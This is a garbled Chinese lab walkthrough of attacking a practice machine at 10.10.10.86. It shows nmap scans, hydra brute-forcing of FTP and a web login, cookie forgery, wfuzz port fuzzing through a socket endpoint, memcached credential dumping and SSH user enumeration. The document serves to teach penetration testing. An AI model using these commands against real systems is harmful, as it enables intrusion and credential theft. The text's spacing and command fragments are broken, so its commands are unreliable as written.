scan nmap -sV -p 21 ,22 ,80 10.10.10.86 Starting Nmap 7 .60 ( https://nmap.org ) at 2018 -12 -18 15 :10 +08 Nmap scan report for 10.10.10.86 Host is up (0 .29 s latency).PORT STATE SERVICE VERSION21 /tcp open ftp vsftpd 3 .0 .3 22 /tcp open ssh OpenSSH 7 .2 p2 Ubuntu 4 ubuntu2 .4 (Ubuntu Linux; protocol 2 .0 )80 /tcp open http nginx 1 .10 .3 (Ubuntu)8080 /tcp open http nginx 1 .10 .3 (Ubuntu)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
全端口检查
Discovered open port 8080 /tcp on 10.10.10.86 Discovered open port 21 /tcp on 10.10.10.86 Discovered open port 80 /tcp on 10.10.10.86 Discovered open port 22 /tcp on 10.10.10.86
没发现其他开放端口
port 22 用msf ssh用户枚举模块,检查存在的用户
info1: user.txt rootnew s
21 ftp 10.10.10.86
trying1:检查弱密码/usr/ share/wordlists/ long-pass-rockyou.txt ftp:// 10.10 .10.86 10.10 .10.86 /usr/ share/wordlists/ rockyou.txt ftp:// 10.10 .10.86
80
根据数据包,可以用hydra爆破
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /login HTTP/1.1 Host : 10.10.10.86 User -Agent: Mozilla/5 .0 (X11 ; Linux x86 _64 ; rv:52 .0 ) Gecko/20100101 Firefox/52 .0 Accept : text/html,application/xhtml+xml,application/xml;q=0 .9 ,*/*;q=0 .8 Accept -Language: en-US,en;q=0 .5 Referer : http://10.10.10.86 /loginConnection : closeUpgrade -Insecure-Requests: 1 Content -Type: application/x-www-form-urlencodedContent -Length: 38 username =000 &password=999 &submit=Login
hydra -L /usr/ share/wordlists/ linux-user.txt -P /usr/ share/wordlists/ 370 -pass.txt 10.10 .10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error" /usr/ share/wordlists/ 500 -worst-passwords.txt 10.10 .10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error" 10.10 .10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error" 5
没有任何关于web口令的进展。
目录扫描 gobuster扫描存在的目录有:
http:// 10.10 .10.86 /login// 10.10 .10.86 :8080 /socket
nginx 1.10.3漏洞 http://www.91ri.org/9064.html 解析漏洞
8080 http://10.10 .10 .86 :8080 Internal DevAccess denied: password authentication cookie not set
dirb http:// 10.10 .10.86 :8080 /socket/ // 10.10 .10.86 :8080 /socket?
trying: 利用info1的字典,用hydra得到了可登录的账号。
hydra -L user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.86 ftp
info2 : ftp账号 [21 ][ftp] host: 10.10 .10 .86 login : ftp password : 123456 21 ][ftp] host: 10.10 .10 .86 login : ftp password : 12345678 21 ][ftp] host: 10.10 .10 .86 login : ftp password : pussy21 ][ftp] host: 10.10 .10 .86 login : ftp password : 12345 21 ][ftp] host: 10.10 .10 .86 login : ftp password : password 21 ][ftp] host: 10.10 .10 .86 login : ftp password : 1234
writeup 通过暴力破解,得到admin/Password1,作为密码,进入80端口。
参考这篇文章 ,Cookie: password=secret,用插件cookie editor修改cookie.
通过验证进入页面后,发现一个tcp连接的php脚本
http://10.10.10.86:8080/socket?port=22&cmd=11
通过fuzz,获取开放的端口。
wfuzz -c --hc=500 -z range,1 -65535 -H "Cookie: password=secret" 'http://10.10.10.86:8080 /socket?port=FUZZ&cmd=11 '
开放的端口除了已知的,还有11211,Memory cache service,内存缓存服务。
免费和开源,高性能,分布式内存对象缓存系统 ,本质上是通用的,但旨在通过减轻数据库负载来加速动态Web应用程序。
搜索“memcached cheat sheet(备忘单)”,得知服务的使用方式。
https://lzone.de/cheat-sheet/memcached
http://10.10.10.86:8080/socket?port=11211&cmd=stats+slabs
http://10.10.10.86:8080/socket?port=11211&cmd=get+users
获得了一系列数据,将这些数据保存为json.
jq . test .json | awk -F\" '{print $2} ' > /root/Desktop/10.10.10.86/user.lsttest .json | awk -F\" '{print $4} ' > /root/Desktop/10.10.10.86/pass.lst
再次ssh扫描可用用户 msfconsole/ssh/ ssh_enumusers10.10 .10.86 /root/ Desktop/10.10.10.86/u ser.lst
genevieve 是有效用户名
jq . test.json | grep genevieve获得了加密的hashfc7992e8952a8ff5000cb7856d8586d2
ssh genevieve@10.10.10.86
总结 值得反思的是,关于弱密码,应该在vps上部署脚本,然后自动化探测。
这个靶机做不出来,很正常的。。。没见过的服务,入侵思路都找不到。
如何检查一张图片中是否有隐藏的信息 exiftool xx.jpg jpg|less binwalk xx.jpg jpg |less
